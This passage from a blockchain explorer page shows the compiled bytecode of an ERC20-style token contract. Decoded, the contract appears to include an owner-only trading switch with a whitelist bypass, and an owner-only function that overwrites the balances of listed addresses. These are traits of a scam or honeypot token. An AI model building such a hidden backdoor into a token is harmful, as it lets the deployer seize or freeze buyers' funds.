61102d610ee9565b5b5f61103b86828701610f37565b935050602061104c86828701610f37565b925050604061105d86828701610f6a565b9150509250925092565b5f60ff82169050919050565b61107c81611067565b82525050565b5f6020820190506110955f830184611073565b92915050565b5f602082840312156110b0576110af610ee9565b5b5f6110bd84828501610f37565b91505092915050565b5f80fd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b61110082610e78565b810181811067ffffffffffffffff8211171561111f5761111e6110ca565b5b80604052505050565b5f611131610ee0565b905061113d82826110f7565b919050565b5f67ffffffffffffffff82111561115c5761115b6110ca565b5b602082029050602081019050919050565b5f80fd5b5f61118361117e84611142565b611128565b905080838252602082019050602084028301858111156111a6576111a561116d565b5b835b818110156111cf57806111bb8882610f37565b8452602084019350506020810190506111a8565b5050509392505050565b5f82601f8301126111ed576111ec6110c6565b5b81356111fd848260208601611171565b91505092915050565b5f806040838503121561121c5761121b610ee9565b5b5f83013567ffffffffffffffff81111561123957611238610eed565b5b611245858286016111d9565b925050602061125685828601610f6a565b9150509250929050565b5f806040838503121561127657611275610ee9565b5b5f61128385828601610f37565b925050602061129485828601610f37565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806112e257607f821691505b6020821081036112f5576112f461129e565b5b50919050565b7f4e6f7420616c6c6f7765640000000000000000000000000000000000000000005f82015250565b5f61132f600b83610e5a565b915061133a826112fb565b602082019050919050565b5f6020820190508181035f83015261135c81611323565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6113ea602483610e5a565b91506113f582611390565b604082019050919050565b5f6020820190508181035f830152611417816113de565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611478602283610e5a565b91506114838261141e565b604082019050919050565b5f6020820190508181035f8301526114a58161146c565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611506602583610e5a565b9150611511826114ac565b604082019050919050565b5f6020820190508181035f830152611533816114fa565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f611594602383610e5a565b915061159f8261153a565b604082019050919050565b5f6020820190508181035f8301526115c181611588565b9050919050565b7f54726164696e67206973206e6f74206f70656e656420796574000000000000005f82015250565b5f6115fc601983610e5a565b9150611607826115c8565b602082019050919050565b5f6020820190508181035f830152611629816115f0565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61166782610f4b565b915061167283610f4b565b925082820190508082111561168a57611689611630565b5b9291505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122001aecde790633bc6423eab8b924d8e8da5e53e6ee8bebcd670021d422230401864736f6c634300081a0033
Deployed Bytecode
0x608060405234801561000f575f80fd5b50600436106100a7575f3560e01c806370a082311161006f57806370a082311461016557806395d89b4114610195578063a3dfc364146101b3578063a9059cbb146101bd578063b474b792146101ed578063dd62ed3e14610209576100a7565b806306fdde03146100ab578063095ea7b3146100c957806318160ddd146100f957806323b872dd14610117578063313ce56714610147575b5f80fd5b6100b3610239565b6040516100c09190610ec0565b60405180910390f35b6100e360048036038101906100de9190610f7e565b6102c9565b6040516100f09190610fd6565b60405180910390f35b6101016102e6565b60405161010e9190610ffe565b60405180910390f35b610131600480360381019061012c9190611017565b6102ef565b60405161013e9190610fd6565b60405180910390f35b61014f6103c3565b60405161015c9190611082565b60405180910390f35b61017f600480360381019061017a919061109b565b6103d8565b60405161018c9190610ffe565b60405180910390f35b61019d61041d565b6040516101aa9190610ec0565b60405180910390f35b6101bb6104ad565b005b6101d760048036038101906101d29190610f7e565b610567565b6040516101e49190610fd6565b60405180910390f35b61020760048036038101906102029190611206565b610584565b005b610223600480360381019061021e9190611260565b61068c565b6040516102309190610ffe565b60405180910390f35b606060038054610248906112cb565b80601f0160208091040260200160405190810160405280929190818152602001828054610274906112cb565b80156102bf5780601f10610296576101008083540402835291602001916102bf565b820191905f5260205f20905b8154815290600101906020018083116102a257829003601f168201915b5050505050905090565b5f6102dc6102d561070e565b8484610715565b6001905092915050565b5f600654905090565b5f6102fb8484846108d8565b6103b88461030761070e565b6103b3856040518060600160405280602881526020016116b76028913960015f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f61036a61070e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610de79092919063ffffffff16565b610715565b600190509392505050565b5f60055f9054906101000a900460ff16905090565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606004805461042c906112cb565b80601f0160208091040260200160405190810160405280929190818152602001828054610458906112cb565b80156104a35780601f1061047a576101008083540402835291602001916104a3565b820191905f5260205f20905b81548152906001019060200180831161048657829003601f168201915b5050505050905090565b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461053d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161053490611345565b60405180910390fd5b60075f9054906101000a900460ff161560075f6101000a81548160ff021916908315150217905550565b5f61057a61057361070e565b84846108d8565b6001905092915050565b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610614576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161060b90611345565b60405180910390fd5b5f5b825181101561068757815f8085848151811061063557610634611363565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508080600101915050610616565b505050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610783576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161077a90611400565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107e89061148e565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516108cb9190610ffe565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610946576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093d9061151c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ab906115aa565b60405180910390fd5b60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680610a4f575060025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15610bf657610abd81604051806060016040528060268152602001611691602691395f808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610de79092919063ffffffff16565b5f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550610b4c815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610e3b90919063ffffffff16565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610be99190610ffe565b60405180910390a3610de2565b60075f9054906101000a900460ff16610c44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c3b90611612565b60405180910390fd5b610cad81604051806060016040528060268152602001611691602691395f808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610de79092919063ffffffff16565b5f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550610d3c815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610e3b90919063ffffffff16565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610dd99190610ffe565b60405180910390a35b505050565b5f838311158290610e2e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e259190610ec0565b60405180910390fd5b5082840390509392505050565b5f8183610e48919061165d565b905092915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f610e9282610e50565b610e9c8185610e5a565b9350610eac818560208601610e6a565b610eb581610e78565b840191505092915050565b5f6020820190508181035f830152610ed88184610e88565b905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610f1a82610ef1565b9050919050565b610f2a81610f10565b8114610f34575f80fd5b50565b5f81359050610f4581610f21565b92915050565b5f819050919050565b610f5d81610f4b565b8114610f67575f80fd5b50565b5f81359050610f7881610f54565b92915050565b5f8060408385031215610f9457610f93610ee9565b5b5f610fa185828601610f37565b9250506020610fb285828601610f6a565b9150509250929050565b5f8115159050919050565b610fd081610fbc565b82525050565b5f602082019050610fe95f830184610fc7565b92915050565b610ff881610f4b565b82525050565b5f6020820190506110115f830184610fef565b92915050565b5f805f6060848603121561102e5761102d610ee9565b5b5f61103b86828701610f37565b935050602061104c86828701610f37565b925050604061105d86828701610f6a565b9150509250925092565b5f60ff82169050919050565b61107c81611067565b82525050565b5f6020820190506110955f830184611073565b92915050565b5f602082840312156110b0576110af610ee9565b5b5f6110bd84828501610f37565b91505092915050565b5f80fd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b61110082610e78565b810181811067ffffffffffffffff8211171561111f5761111e6110ca565b5b80604052505050565b5f611131610ee0565b905061113d82826110f7565b919050565b5f67ffffffffffffffff82111561115c5761115b6110ca565b5b602082029050602081019050919050565b5f80fd5b5f61118361117e84611142565b611128565b905080838252602082019050602084028301858111156111a6576111a561116d565b5b835b818110156111cf57806111bb8882610f37565b8452602084019350506020810190506111a8565b5050509392505050565b5f82601f8301126111ed576111ec6110c6565b5b81356111fd848260208601611171565b91505092915050565b5f806040838503121561121c5761121b610ee9565b5b5f83013567ffffffffffffffff81111561123957611238610eed565b5b611245858286016111d9565b925050602061125685828601610f6a565b9150509250929050565b5f806040838503121561127657611275610ee9565b5b5f61128385828601610f37565b925050602061129485828601610f37565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806112e257607f821691505b6020821081036112f5576112f461129e565b5b50919050565b7f4e6f7420616c6c6f7765640000000000000000000000000000000000000000005f82015250565b5f61132f600b83610e5a565b915061133a826112fb565b602082019050919050565b5f6020820190508181035f83015261135c81611323565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6113ea602483610e5a565b91506113f582611390565b604082019050919050565b5f6020820190508181035f830152611417816113de565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611478602283610e5a565b91506114838261141e565b604082019050919050565b5f6020820190508181035f8301526114a58161146c565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611506602583610e5a565b9150611511826114ac565b604082019050919050565b5f6020820190508181035f830152611533816114fa565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f611594602383610e5a565b915061159f8261153a565b604082019050919050565b5f6020820190508181035f8301526115c181611588565b9050919050565b7f54726164696e67206973206e6f74206f70656e656420796574000000000000005f82015250565b5f6115fc601983610e5a565b9150611607826115c8565b602082019050919050565b5f6020820190508181035f830152611629816115f0565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61166782610f4b565b915061167283610f4b565b925082820190508082111561168a57611689611630565b5b9291505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122001aecde790633bc6423eab8b924d8e8da5e53e6ee8bebcd670021d422230401864736f6c634300081a0033
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.
Add Token to MetaMask (Web3)